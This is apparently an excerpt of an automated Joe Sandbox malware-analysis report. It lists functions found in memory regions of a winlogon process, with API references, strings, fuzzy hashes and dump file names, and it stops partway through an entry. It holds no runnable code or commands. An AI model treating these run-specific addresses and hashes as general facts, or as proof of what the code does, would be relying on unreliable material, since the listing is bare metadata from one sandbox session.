Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: F3616D72614BC4C6DB219B15E4407DEBBA0FB99B94F044226EF9C17BA5DF78C1A4CB01

Function 000001E85898AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E85898AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001E85898ABBC

Strings

csm, xrefs: 000001E85898AC0E
csm, xrefs: 000001E85898AAF6

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 61b8ed2191b81079838a078a07b00c27b39673080e75a3640b0516ff567da48a
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 6E5117332206C2CAEB648B26D94439DB7E1EB95B94F148127DE9D47B95CF38D451CB03

Function 000001E85898A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000001E85898A75B
_CallSETranslator.LIBVCRUNTIME ref: 000001E85898A7A7

Strings

MOC, xrefs: 000001E85898A76F
RCC, xrefs: 000001E85898A777

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 237c7bf8059998886fd6e76e132d35b59d02ee831f4b474557ebd09e9101aac5
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 31616A33618BC5C5EB608B25E4407DEB7A0FB85B98F044226EE9C13B99DF78C191CB02

Function 000001E858959EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001E858959ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001E858959FBC

Strings

csm, xrefs: 000001E85895A00E
csm, xrefs: 000001E858959EF6

Memory Dump Source

Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 79d4f442513ea6074362501cc60a5e91ef021592a8e5cf710cdd5a3edcf7ebc0
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: C65149322242C5CAEB648B21E54439DB7E0EF55B96F144127DE9E47B95CF38C891CB06

Function 000001E8589F2660 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001E8589F2778
GetLastError.KERNEL32 ref: 000001E8589F279D

Strings

!-M, xrefs: 000001E8589F267F
U, xrefs: 000001E8589F2722

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U$ !-M
API String ID: 442123175-2293091100
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: c669f7e80c849c7e795aa88b4f74ad4c10997911cc59df6ae954efb627a82d49
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 8141AD72625A80C6EB259FA5E8447DEF7A1FB88794F944132EE4D87798EF38C441CB40

Function 000001E8589B3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001E8589B3972
StrStrW.SHLWAPI ref: 000001E8589B3990
StrToIntW.SHLWAPI ref: 000001E8589B39B7

Part of subcall function 000001E8589B1A30: OpenProcess.KERNEL32 ref: 000001E8589B1A56
Part of subcall function 000001E8589B1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001E8589B1A74
Part of subcall function 000001E8589B1A30: PathFindFileNameW.SHLWAPI ref: 000001E8589B1A83
Part of subcall function 000001E8589B1A30: lstrlenW.KERNEL32 ref: 000001E8589B1A8F
Part of subcall function 000001E8589B1A30: StrCpyW.SHLWAPI ref: 000001E8589B1AA2
Part of subcall function 000001E8589B1A30: CloseHandle.KERNEL32 ref: 000001E8589B1AB0

Part of subcall function 000001E8589B3F88: StrCmpNIW.SHLWAPI(?,?,?,000001E8589B272F), ref: 000001E8589B3FA0

Strings

pid_, xrefs: 000001E8589B3968

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: a4f7c1d3c8705480cf3b39b7eae3cc7439d2fd79865e05cd4d819d0bcf9f78a9
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 05112631328BC1E6EB10DB25EC143DEB7A4BF98B81F944136AE4D83695EF69C909D740

Function 000001E8589E3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001E8589E3972
StrStrW.SHLWAPI ref: 000001E8589E3990
StrToIntW.SHLWAPI ref: 000001E8589E39B7

Part of subcall function 000001E8589E1A30: OpenProcess.KERNEL32 ref: 000001E8589E1A56
Part of subcall function 000001E8589E1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001E8589E1A74
Part of subcall function 000001E8589E1A30: PathFindFileNameW.SHLWAPI ref: 000001E8589E1A83
Part of subcall function 000001E8589E1A30: lstrlenW.KERNEL32 ref: 000001E8589E1A8F
Part of subcall function 000001E8589E1A30: StrCpyW.SHLWAPI ref: 000001E8589E1AA2
Part of subcall function 000001E8589E1A30: CloseHandle.KERNEL32 ref: 000001E8589E1AB0

Part of subcall function 000001E8589E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001E8589E272F), ref: 000001E8589E3FA0

Strings

pid_, xrefs: 000001E8589E3968

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: dd026c5fa4d2330457ae385103dc0bf4f460bc2cdbdd279a505453133e33b41c
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 79116A31330BC1E2EB209B25EC443DEBAA4BF88780F804036AE5DC3694EF68C955DB40

Function 000001E858983950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000001E858983972
StrStrW.SHLWAPI ref: 000001E858983990
StrToIntW.SHLWAPI ref: 000001E8589839B7

Part of subcall function 000001E858981A30: OpenProcess.KERNEL32 ref: 000001E858981A56
Part of subcall function 000001E858981A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001E858981A74
Part of subcall function 000001E858981A30: PathFindFileNameW.SHLWAPI ref: 000001E858981A83
Part of subcall function 000001E858981A30: lstrlenW.KERNEL32 ref: 000001E858981A8F
Part of subcall function 000001E858981A30: StrCpyW.SHLWAPI ref: 000001E858981AA2
Part of subcall function 000001E858981A30: CloseHandle.KERNEL32 ref: 000001E858981AB0

Part of subcall function 000001E858983F88: StrCmpNIW.SHLWAPI(?,?,?,000001E85898272F), ref: 000001E858983FA0

Strings

pid_, xrefs: 000001E858983968

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 77fbfae80de7dc18d22d0964eaae67b14a423c715cee422fe909abb7954749d3
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 30113731324BC2E2EB109B25EC553DEB3A4BF88780F944136AE4DC3694EF69C945DB40

Function 000001E8589E8070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(?,?,?,?,?,?,000001E8589E7BF1), ref: 000001E8589E8856
capture_previous_context.LIBCMT ref: 000001E8589E886E
__raise_securityfailure.LIBCMT ref: 000001E8589E8910

Strings

!-M, xrefs: 000001E8589E88E8

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: FeaturePresentProcessor__raise_securityfailurecapture_previous_context
String ID: !-M
API String ID: 838830666-3625753649
Opcode ID: 5d73ba4cf61c258e47cb3bab5a4b974cfb05aa9f852afdb55bf25e222216e53e
Instruction ID: 1bc11dc885bcc7d3ceb89c70c773aaa032a79fd5d3729657bab22ccef2b70508
Opcode Fuzzy Hash: 5d73ba4cf61c258e47cb3bab5a4b974cfb05aa9f852afdb55bf25e222216e53e
Instruction Fuzzy Hash: 8821C274265B80C2EB829B54EC913DDBAA4FB85344FA00137DE8E967A1EF3C84558711

Function 000001E8589C1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001E8589C2027
WriteFile.KERNEL32 ref: 000001E8589C2304
WriteFile.KERNEL32 ref: 000001E8589C234A
GetLastError.KERNEL32 ref: 000001E8589C2409

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 7a3af278c6e720fa22ad203ccb08c69839dc181df0b3a247f022752b061cb0db
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 3DD1AA32728A84CAE711CFA9D4403ECBBB1FB54B98F444226DE5EA7B99DE35C506C340

Function 000001E858991FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001E858992027
WriteFile.KERNEL32 ref: 000001E858992304
WriteFile.KERNEL32 ref: 000001E85899234A
GetLastError.KERNEL32 ref: 000001E858992409

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: f026f3b48aa472f1155e9ab151f477d46f8fa57846d6a2d32a19188b789717b6
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 7ED1DE32724A84C9E711CFA5D4402ECB7B2FB54B98F444227DE6EA7B99DE34C156C740

Function 000001E8589B14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B14C6
HeapFree.KERNEL32 ref: 000001E8589B14D5
GetProcessHeap.KERNEL32 ref: 000001E8589B14E2
HeapFree.KERNEL32 ref: 000001E8589B14F1
GetProcessHeap.KERNEL32 ref: 000001E8589B1501

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 85548942e99c9506d717767bddf68c56fc7092a0cd4320be4496cac7d0c31cd3
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 7E01D332624A90DAE714EF66E80829DBBA1FB88F81B0A4036DF4D53728DE39D491C740

Function 000001E8589E14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589E14C6
HeapFree.KERNEL32 ref: 000001E8589E14D5
GetProcessHeap.KERNEL32 ref: 000001E8589E14E2
HeapFree.KERNEL32 ref: 000001E8589E14F1
GetProcessHeap.KERNEL32 ref: 000001E8589E1501

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: d5f528d63e6feb08309cdca42a1afb5b17736821da054d828a3cb29391c2735b
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 3F01D732720A90DAE719EF66E84419DBBA1FB88F81B094036EF4D57768DE34E461C740

Function 000001E8589814A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589814C6
HeapFree.KERNEL32 ref: 000001E8589814D5
GetProcessHeap.KERNEL32 ref: 000001E8589814E2
HeapFree.KERNEL32 ref: 000001E8589814F1
GetProcessHeap.KERNEL32 ref: 000001E858981501

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 651c372f9e027c0f515e74e51b651074f210ef9c576e9b995b9ccc74c9d379da
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 4A01D732620A90DAE724EF66E80419EB7A2FB88F81B094036DF4D53728EE34D451C740

Function 000001E8589C28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001E8589C28DF), ref: 000001E8589C2A12

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 0011b82c73006544e61d9242a2f0458b14590937442378c818543140c3e594b1
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: F191DD32720690C9FB609FA5D8503EDFFA0BB55B88F44412BDE4E67A95DE36C486C300

Function 000001E8589F28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001E8589F28DF), ref: 000001E8589F2A12

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 63b059fa379599774d0a53ac3b487b22b4f6831f2685035a2ab0bac27bba78e6
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: D291CE32720690C9FB6A8FA5D8503EDFBA0BB55B98F54412BDE4E67A85DE34C486C700

Function 000001E8589928F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001E8589928DF), ref: 000001E858992A12

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 988a3d2560d2666c34e170dd821e7d56b53ff1f52112a4074da463ec6a783af7
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 3191FE32721690C9FB609FA5D8503EDFBA2FB55B98F44412BDE1E63A95DE34C486C300

Function 000001E8589B8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001E8589B80BC
GetCurrentThreadId.KERNEL32 ref: 000001E8589B80CA
GetCurrentProcessId.KERNEL32 ref: 000001E8589B80D6
QueryPerformanceCounter.KERNEL32 ref: 000001E8589B80E6

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 6067695c91f6c725ff6508a8110375a362891e2ec0ade76fc3a726de7d17ef3a
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 10110336721B44CAEB00CB60E8593AC73A4FB19768F840A22EE6E867A4DF78C1548740

Function 000001E8589EE8E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

